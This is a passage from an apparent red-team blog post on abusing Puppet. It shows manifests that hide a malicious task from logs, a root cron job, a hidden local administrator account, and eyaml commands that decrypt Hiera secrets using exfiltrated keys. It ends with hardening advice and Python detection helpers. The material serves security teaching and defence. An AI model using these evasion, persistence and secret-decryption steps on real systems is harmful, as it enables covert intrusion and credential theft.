user => 'SYSTEM',

}

}

Which results in the creation of our SchTask. The SchTask can also be started via Puppet.

Hiding from Logs

Puppet has good logging for activities that have occurred, but a few minor tricks can help you stay beneath the radar. These mainly centre around reducing any stdout logs (or what is shown in the Application event log) and avoiding non-zero exit codes, which may cause CI/CD pipelines to fail and attract sysadmin attention.

LogLevel

This is natively supported by Puppet, and tasks normally only log verbose output if they fail. Source. Normal Puppet audit events are still generated, but very few organisations will be aware of their existence, let alone be monitoring them.

    exec { 'silent_task':
      command   => '/path/to/script.sh',
      logoutput => false,   # Suppress output in logs
      loglevel  => 'debug', # Only logs when Puppet is run in debug mode
    }

Redirect stdout

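    exec { 'linux_silent_task':
      command   => '/path/to/script.sh > /dev/null 2>&1',
      logoutput => false,
      provider  => shell, # Run via /bin/sh so the redirection is interpreted
    }

or

    exec { 'windows_silent_task':
      # The windows provider does not use a shell, so call cmd.exe for the redirection
      command   => 'C:\\Windows\\System32\\cmd.exe /c "C:\\path\\to\\script.exe > NUL 2>&1"',
      logoutput => false,
      provider  => 'windows',
    }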

Return Zero

    exec { 'silent_task':
      command   => '/path/to/script.sh',
      logoutput => false,
      returns   => [0], # Exit codes treated as success; anything else is logged as a failure
    }

Cron Jobs

Puppet would log the creation of the cron job (created through the cron resource type), but not the execution of the malicious task, as that is not executed via Puppet.

    cron { 'silent_task':
      command => '/path/to/script.sh > /dev/null 2>&1',
      user    => 'root',
      minute  => '*/5',
    }

Removing Reporting Entries

Puppet will create reporting events on the PuppetServer and the managed agent. These are referenced here. This is easy to change on the PuppetServer (although it will likely need a restart of Puppet), but I do not know whether you can remotely change this setting on a managed endpoint via Puppet and then carry out your now-unreported malicious task.
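From the defender's side, a change like this is cheap to check for. The sketch below is a minimal example in Python, assuming the settings in question are `report` (agent side) and `reports` (server side) in puppet.conf; that mapping is my assumption rather than something confirmed above, and the function name is made up for illustration. It also assumes the file has section headers such as [main] or [agent], which the standard library parser requires.

```python
import configparser


def reporting_findings(puppet_conf_text):
    """Return notes for puppet.conf settings that would reduce run reporting.

    Assumption: 'report = false' stops an agent sending reports and
    'reports = none' stops the server processing them.
    """
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.read_string(puppet_conf_text)

    findings = []
    for section in parser.sections():
        # Fall back to Puppet's documented defaults when a setting is absent.
        report = parser.get(section, "report", fallback="true").strip().lower()
        reports = parser.get(section, "reports", fallback="store").strip().lower()
        if report == "false":
            findings.append(f"[{section}] report = false (agent sends no run reports)")
        if reports == "none":
            findings.append(f"[{section}] reports = none (server discards run reports)")
    return findings
```

Feeding it the contents of /etc/puppetlabs/puppet/puppet.conf from each host (or from config backups) and alerting on any non-empty result would be one way to spot reporting being switched off.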

Hiera

Hiera is a key-value lookup mechanism within Puppet, often used to store encrypted credentials that are accessible to Puppet runs. Clearly, we don’t want to be hardcoding cleartext credentials into our source code. Most places tend to make use of some form of private/public key combination, with the key living on the PuppetServer, and the encrypted values being pushed to Git. Conceptually, this is not far from the Ansible Vault idea.

Encrypted values in Hiera are handled by EYAML (hiera-eyaml), and it is virtually certain that the prerequisites are already installed on the PuppetServer, especially if the target is making use of encrypted variables.

    puppetserver gem install hiera-eyaml

The below syntax can be used to encrypt and decrypt strings. If you have a copy of the source code and a copy of the keys, this can obviously be performed offline on your machine too.

If Hiera is in use, you will also see a hiera.yaml, often in /etc/puppetlabs/puppet/hiera.yaml. This file specifies where Hiera should look for its data, including any encrypted values.

Note: If you aren’t sure whether you are in the right file / directory: puppet config print hiera_config

    ---
    version: 5
    defaults:
      datadir: "/etc/puppetlabs/code/environments/%{environment}/data"
      # The folder within 'Production' where encrypted strings are referenced
      data_hash: yaml_data
    hierarchy:
      - name: "Common data"
        path: "common.yaml" # Where encrypted strings go. eg production/data/common.yaml

Simple Encryption

We’ll encrypt the credentials used in the previous adduser Puppet code.

    cd /etc/puppetlabs/puppet
    eyaml createkeys

Now that key material is configured, we can encrypt the strings manually then replace the values in the Puppet code.

    eyaml encrypt -o string -s 'Password123!'

Here -s supplies the plaintext as a string argument and -o string prints the result as a single string. To read the plaintext from a pipe instead, use --stdin.

    ENC[PKCS7,MIIBeQYJKoZIhvcNAQcDoIIBajCCAWYCAQAxggEhMIIBHQIBADAFMAACAQEwDQYJKoZIhvcNAQEBBQAEggEAafqeztkuFlfawfjhQgRYmbgI+WrKQKwJ+vaCuIydeZ17j1A6Yv2LRETHfVrxqN3bBggfuhLlmg7GAHF3I5oFri9l06Vg94tVXx4UHT09hub1IXtXzyNIU9bbuyBw6kPW3VuMwlPLF0g3ovMl8ATsQBd9aEMFNlcS1Q3FapRkdOIe/guo3S/glDKEbHVIj34Kq6DEPBxhGfYbx+4warmvSzUcVqe1zi2xNAb0WRLxmIFIIxDTpsSuVC6fFwZQawJeqRun5usJfndd1IWL7Tm1uOzu8thwt2ODKzeVmHEdqH/yTfhT7YLuRbwBnNQepvF8smkFSB98oIhGa+Uqr9f9wzA8BgkqhkiG9w0BBwEwHQYJYIZIAWUDBAEqBBAj8TC4XhpF7Hb02hJjK+9jgBAauaXf2+CP6GvUGxFraN65]

Create a data directory and common.yaml within the environment directory at /etc/puppetlabs/code/environments/production/data/common.yaml. This path is the data directory and the filename specified in hiera.yaml previously.

We can now place the encrypted value in common.yaml. We can then also spend an additional 5 minutes enjoying YAML’s pickiness with indenting and formatting.

    ---
    useraddwindowsencrypted::password: >
        ENC[PKCS7,MIIBeQYJKoZIhvcNAQcDoIIBajCCAWYCAQAxggEhMIIBHQIBADAFMAACAQEwDQYJKoZIhvcNAQEBBQAEggEAafqeztkuFlfawfjhQgRYmbgI+WrKQKwJ+vaCuIydeZ17j1A6Yv2LRETHfVrxqN3bBggfuhLlmg7GAHF3I5oFri9l06Vg94tVXx4UHT09hub1IXtXzyNIU9bbuyBw6kPW3VuMwlPLF0g3ovMl8ATsQBd9aEMFNlcS1Q3FapRkdOIe/guo3S/glDKEbHVIj34Kq6DEPBxhGfYbx+4warmvSzUcVqe1zi2xNAb0WRLxmIFIIxDTpsSuVC6fFwZQawJeqRun5usJfndd1IWL7Tm1uOzu8thwt2ODKzeVmHEdqH/yTfhT7YLuRbwBnNQepvF8smkFSB98oIhGa+Uqr9f9wzA8BgkqhkiG9w0BBwEwHQYJYIZIAWUDBAEqBBAj8TC4XhpF7Hb02hJjK+9jgBAauaXf2+CP6GvUGxFraN65]

Return to the modules directory, where there is an additional class at the bottom (commented out so that it did not cause earlier runs to fail before Hiera was configured). Note the changes to the password field compared to the plaintext credentials, or to the SHA credentials earlier.

    class useraddwindowsencrypted {
      if $facts['os']['family'] == 'Windows' {
        user { 'puppetlocaluserencypted':
          ensure     => present,
          password   => lookup('useraddwindowsencrypted::password'),
          groups     => ['Administrators'],
          managehome => true,
        }
      }
    }

You can test whether Hiera can look up the value with:

    puppet lookup useraddwindowsencrypted::password --explain
    Searching for "lookup_options"
      Global Data Provider (hiera configuration version 5)
        Using configuration "/etc/puppetlabs/puppet/hiera.yaml"
        Hierarchy entry "Common data"
          Path "/etc/puppetlabs/puppet/data/common.yaml"
            Original path: "common.yaml"
            Found key: "lookup_options"
    Searching for "useraddwindowsencrypted::password"
      Global Data Provider (hiera configuration version 5)
        Using configuration "/etc/puppetlabs/puppet/hiera.yaml"
        Hierarchy entry "Common data"
          Path "/etc/puppetlabs/puppet/data/common.yaml"
            Original path: "common.yaml"
            Found key: "useraddwindowsencrypted::password" value:
              ENC[PKCS7,M[SNIPPED]65]

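If you run the Puppet agent on the Windows machine, you will see the creation of a new user with the password of Password123!. This relies on Hiera decrypting the value at lookup time: the hierarchy level needs to use lookup_key: eyaml_lookup_key (with the PKCS7 key paths under options) rather than data_hash: yaml_data, otherwise the lookup hands back the ENC[...] string unchanged.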

Simple Decryption

If you have access to Puppet source files and any PEM / P7b files from the /etc/puppet folder, you can use them to decrypt the credentials. A simple way to decrypt credentials if you are on the same host as the Puppet installation is:

    eyaml decrypt -f /etc/puppetlabs/puppet/data/common.yaml

or

    puppet lookup useraddwindowsencrypted::password

Followed by:

    eyaml decrypt -s 'ENC[PKCS7,MII...]' # String from puppet lookup.

Mass Decryption

If you have exfiltrated the key and a copy of the Puppet source code to a machine you control (without Puppet), you can use the below syntax to decrypt.

    eyaml decrypt -f /path/to/puppet/data/common.yaml --pkcs7-private-key=/path/to/private_key.pkcs7.pem

The plaintext values are then replaced in the common.yaml, rather than being printed to stdout or similar. ChatGPT can knock you up a bash script to recursively decrypt all values in a repo using a private key.
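Before decrypting anything in bulk, it helps to know which files in the repo actually hold encrypted values. The following is a minimal sketch in Python that only inventories ENC[PKCS7,...] tokens and does not decrypt them. The function name, the file extensions it checks and the regular expression are my own assumptions for illustration, not part of eyaml.

```python
import re
from pathlib import Path

# Matches an eyaml PKCS7 token such as ENC[PKCS7,MIIB...]. Whitespace is allowed
# inside the payload because YAML block scalars may wrap the base64 across lines.
ENC_TOKEN = re.compile(r"ENC\[PKCS7,[A-Za-z0-9+/=\s]+\]")

# Assumed extensions for Hiera data files; adjust for the repo in question.
DATA_SUFFIXES = {".yaml", ".yml", ".eyaml"}


def find_encrypted_values(repo_root):
    """Yield (path, line number, token length) for each eyaml token under repo_root."""
    for path in sorted(Path(repo_root).rglob("*")):
        if not path.is_file() or path.suffix not in DATA_SUFFIXES:
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        for match in ENC_TOKEN.finditer(text):
            # Line number of the first character of the token (1-based).
            line_no = text.count("\n", 0, match.start()) + 1
            yield path, line_no, len(match.group(0))
```

Looping over `find_encrypted_values("/path/to/puppet")` and printing each tuple gives a quick list of files worth passing to eyaml decrypt. The same list is equally useful to a defender deciding which secrets need rotating after a key has leaked.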

Protection

The usual ‘secure my DevOps pipeline’ recommendations apply equally to Puppet repositories. To repeat them here in an abbreviated form would be a gross oversimplification; however, some points are more pertinent than others. As ever, OWASP have some sensible high-level thoughts and poisoned pipeline guidance.

If CI jobs are going to run on push events or PR merge events, then a robust multi-eye process to protect those branches is critical. Branch Protections / Merge Approvals are all part of the hardening steps.

It is very common during Red Team exercises to clone a repository containing encrypted credentials to the ‘User Area’ of the Source Control Platform (eg clone it to the Personal section of GitLab), after which you can amend the CI to exfiltrate secrets as described in the main article.

Adequately protected and isolated Runners are also essential. If Runners are being used to deploy Puppet configurations or manage the source code / key material (the key material often remains on disk for extended periods), then they should be configured as Protected Runners with tags at the Project level, rather than Group or Organisation level. This prevents people from cloning the repository and inserting malicious GitLabCI to obtain files and credential material, simply through specifying the tag of a runner that they want code execution on.

Self-hosted GitLab permits Public projects and, by default, lets any user sign up, which can mean any user is able to carry out the types of attacks described above. GitLab have some good (and very achievable) hardening best practices here.

Addins such as the GitHub Harden-Runner may also be useful, as described here.

Detections

EDR tends to turn a bit of a blind eye to Puppet operations (even if there is EDR on Linux…) as Puppet frequently ‘does odd things’.

On Windows, the usual EDRs will capture all of the activity via their drivers, so the telemetry for ‘New Local User Created’ and similar should still be there. Execution of MSIs via msiexec.exe should show up in the normal parent-child relationship within the process tree.

Puppet logs to the Application event log by default on Windows, and to syslog on Linux. Puppet Enterprise can also make use of Puppet audit events as described here, but I have never seen this done. I might do a Part 2 to this post where we generate some malicious Puppet activity and then look for it in Elastic EDR and Puppet Audits.
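In the meantime, the log-suppression tricks from the Hiding from Logs section leave fingerprints in the manifests themselves, so a crude lint over the Puppet repo (for example as a CI step on merge requests) is a cheap detection. Below is a minimal sketch in Python. The patterns and function names are my own heuristics for illustration and will throw false positives, since logoutput => false is perfectly legitimate in plenty of codebases.

```python
import re
from pathlib import Path

# Heuristic patterns chosen for illustration; tune them for your own codebase.
SUSPICIOUS = {
    "loglevel lowered to debug": re.compile(r"loglevel\s*=>\s*['\"]?debug['\"]?"),
    "logoutput disabled": re.compile(r"logoutput\s*=>\s*false"),
    "output redirected to null device": re.compile(r">\s*(/dev/null|NUL)\b", re.IGNORECASE),
}


def lint_manifest(text):
    """Return (line number, reason) pairs for lines matching a heuristic."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for reason, pattern in SUSPICIOUS.items():
            if pattern.search(line):
                findings.append((line_no, reason))
    return findings


def lint_tree(root):
    """Lint every .pp manifest beneath root and return {path: findings}."""
    results = {}
    for path in sorted(Path(root).rglob("*.pp")):
        findings = lint_manifest(path.read_text(encoding="utf-8", errors="replace"))
        if findings:
            results[str(path)] = findings
    return results
```

Running `lint_tree` against a checkout of the control repo and reviewing anything new since the last run is probably more useful than treating every hit as malicious.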